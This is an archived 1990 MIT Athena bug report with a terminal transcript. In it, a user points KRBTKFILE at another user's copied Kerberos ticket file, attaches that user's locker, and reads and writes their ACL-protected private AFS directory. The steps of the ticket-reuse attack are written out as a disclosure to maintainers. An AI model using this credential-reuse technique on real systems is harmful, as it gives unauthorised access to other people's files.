[4418] in Athena Bugs
vax 6.4R: kerberos and afs
daemon@ATHENA.MIT.EDU (arnewman@ATHENA.MIT.EDU)
Mon Mar 5 16:36:31 1990
From: arnewman@ATHENA.MIT.EDU
To: bugs@ATHENA.MIT.EDU
Date: Mon, 05 Mar 90 16:35:52 EST
System name: akbar
Type and version: CVAXSTAR 6.4R
Display type: SM
What were you trying to do?
I was trying to prove that Kerberos would not allow the usage of someone
else's tickets. The tickets were created by the owner on a vax.
What's wrong:
I was able to use these tickets to read and write to directories to
which I had no access. The access control list on the
/mit/henry/private directory is:
Access list for . is
Normal rights:
henry rlidwka
What should have happened:
I should have been denied both read and write access to this directory.
Please describe any relevant documentation references:
I am including a transcript of my session.
Script started on Mon Mar 5 16:21:10 1990
athena% klist
Ticket file: /tmp/tkt_ttyv0
Principal: arnewman@ATHENA.MIT.EDU
Issued Expires Principal
Mar 5 16:19:47 Mar 6 00:19:47 krbtgt.ATHENA.MIT.EDU@ATHENA.MIT.EDU
Mar 5 16:19:50 Mar 6 00:19:50 afs.athena.mit.edu@ATHENA.MIT.EDU
Mar 5 16:20:25 Mar 6 00:20:25 zephyr.zephyr@ATHENA.MIT.EDU
Mar 5 16:20:42 Mar 6 00:20:42 pop.athena-po-1@ATHENA.MIT.EDU
Mar 5 16:20:50 Mar 6 00:20:50 olc.matisse@ATHENA.MIT.EDU
athena% echo "Now setting KRBTKFILE to read forged ticket file."
Now setting KRBTKFILE to read forged ticket file.
athena% setenv KRBTKFILE ~/athena/tkt_henry
athena% klist
Ticket file: /mit/arnewman/athena/tkt_henry
Principal: henry@ATHENA.MIT.EDU
Issued Expires Principal
Mar 5 16:02:09 Mar 6 00:02:09 krbtgt.ATHENA.MIT.EDU@ATHENA.MIT.EDU
Mar 5 16:02:11 Mar 6 00:02:11 rcmd.e40-008-10@ATHENA.MIT.EDU
Mar 5 16:02:15 Mar 6 00:02:15 afs.athena.mit.edu@ATHENA.MIT.EDU
Mar 5 16:04:36 Mar 6 00:04:36 zephyr.zephyr@ATHENA.MIT.EDU
Mar 5 16:04:43 Mar 6 00:04:43 pop.e40-po@ATHENA.MIT.EDU
Mar 5 16:04:52 Mar 6 00:04:52 olc.matisse@ATHENA.MIT.EDU
athena% tokens
Tokens held by the Cache Manager: (** marks primary identity)
[ 0] User ViceID=11373 for afs@athena.mit.edu [Expires Mar 6 00:19]
[ 1] --End of list--
athena% echo "Tokens still based on tickets received at original login."
Tokens still based on tickets received at original login.
athena% attach henry
henry: Already attached...mapping
Error while subscribing: Couldn't lock ticket file
athena% tokens
Tokens held by the Cache Manager: (** marks primary identity)
[ 0] User ViceID=11373 for afs@athena.mit.edu [Expires Mar 6 00:02]
[ 1] --End of list--
athena% cd /mit/henry/private
athena% ls
dot-login-for-testing resume.EZ txt
fcc.shar src
athena% cat dot-login-for-testing
# Prototype user .login file
# $Author: epeisach $
# $Source: /paris/source/4.3/prototype/RCS/.login,v $
# $Header: /paris/source/4.3/prototype/RCS/.login,v 1.14 89/08/14 17:43:17 epeisach Exp $
# This file sources a system-wide .login file, which:
# - presumes that the .cshrc file has been sourced
# - performs standard setups appropriate for tty session
# - runs standard startup activities (e.g., check mail)
# - source user file ~/.startup.tty, if it exists
set initdir=/usr/athena/lib/init
if (-r $initdir/login) then
source $initdir/login
else
if (-r /usr/prototype_user/.login) then
echo "If this is a workstation in a public cluster, you"
echo "should be getting the 6.3 upgrade within a few days."
echo "If this is a private workstation, please contact the"
echo "Athena Hotline at x3-1410 (by email: hotline@ATHENA),"
echo "in order to arrange to have your workstation upgraded."
source /usr/prototype_user/.login
else
echo "Warning: System-wide initialization files not found."
echo "Login initialization has not been performed."
endif
endif
# If you want to ADJUST the login initialization sequence, create a
# .startup.tty file in your home directory, with commands to run activities
# once the environment has been set up (znol, emacs, etc.).
# To adjust the environment initialization sequence, see the instructions in
# the .cshrc file.
# If you want to CHANGE the login initialization sequence, revise this .login
# file (the one you're reading now). You may want to copy the contents of
# the system-wide login file as a starting point.
#
# WARNING: If you revise this .login file, you will not automatically
# get any changes that Project Athena may make to the system-wide file at
# a later date. Be sure you know what you are doing.
athena% touch testfile
athena% ls -lag
total 49
drwx------ 4 henry wheel 2048 Mar 5 16:24 .
drwxrwxrwx 13 henry wheel 4096 Mar 5 16:09 ..
-rwx------ 1 henry wheel 1820 Mar 5 16:23 dot-login-for-testing
-rw------- 1 henry wheel 27586 Aug 1 1988 fcc.shar
-rw------- 1 henry wheel 8862 Jul 28 1989 resume.EZ
drwx------ 2 henry wheel 2048 Jul 29 1989 src
-rw------- 1 henry wheel 0 Mar 5 16:24 testfile
drwx------ 8 henry wheel 2048 Sep 28 15:35 txt
athena% tokens
Tokens held by the Cache Manager: (** marks primary identity)
[ 0] User ViceID=11373 for afs@athena.mit.edu [Expires Mar 6 00:02]
[ 1] --End of list--
athena% klist
Ticket file: /mit/arnewman/athena/tkt_henry
klist: Can't lock ticket file; try later (tf_util)
athena% klist
Ticket file: /mit/arnewman/athena/tkt_henry
klist: Can't lock ticket file; try later (tf_util)
athena% zwrite arnewman -m Test
zwrite: Couldn't lock ticket file while sending notice to arnewman
athena% cd /� �� �� �� �ls -lag /mit/arnewman/athena/tkt_henry
-rw------- 1 arnewman wheel 687 Mar 5 16:05 /mit/arnewman/athena/tkt_henry
athena% cd
athena% klist
Ticket file: /mit/arnewman/athena/tkt_henry
klist: Can't lock ticket file; try later (tf_util)
athena% cd /mit/henry/private
athena% ls
dot-login-for-testing resume.EZ testfile
fcc.shar src txt
athena%
script done on Mon Mar 5 16:26:02 1990
